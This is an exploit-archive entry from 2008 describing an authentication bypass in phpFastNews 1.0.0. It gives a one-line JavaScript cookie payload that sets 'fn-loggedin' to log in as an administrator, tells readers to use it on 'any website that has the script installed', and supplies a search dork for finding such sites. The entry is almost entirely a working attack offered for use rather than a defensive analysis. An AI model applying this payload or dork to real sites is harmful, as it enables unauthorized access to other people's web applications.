[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability
# Published : 2008-10-18
# Author : Qabandi
# Previous Title : XOOPS Module GesGaleri (kategorino) Remote SQL Injection Exploit
# Next Title : zeeproperty (adid) Remote SQL Injection Vulnerability
#################################################
## Qabandi iqa[at]hotmail.fr ##
## from Kuwait ##
#################################################
\ phpFastNews
// Insecure cookie handling
\
// Go to any website that has the script installed
\ type the following code into the Adress Bar
//
\ javascript:document.cookie = "fn-loggedin = 1";
//
\ Refresh do whatever, and you will be logged in
//
\ Dork:intext:"Powered by phpFastNews"
#################################################
## Greetz: Killer Hack, Str0ke ##
#################################################
PEACE
# www.Syue.com [2008-10-18]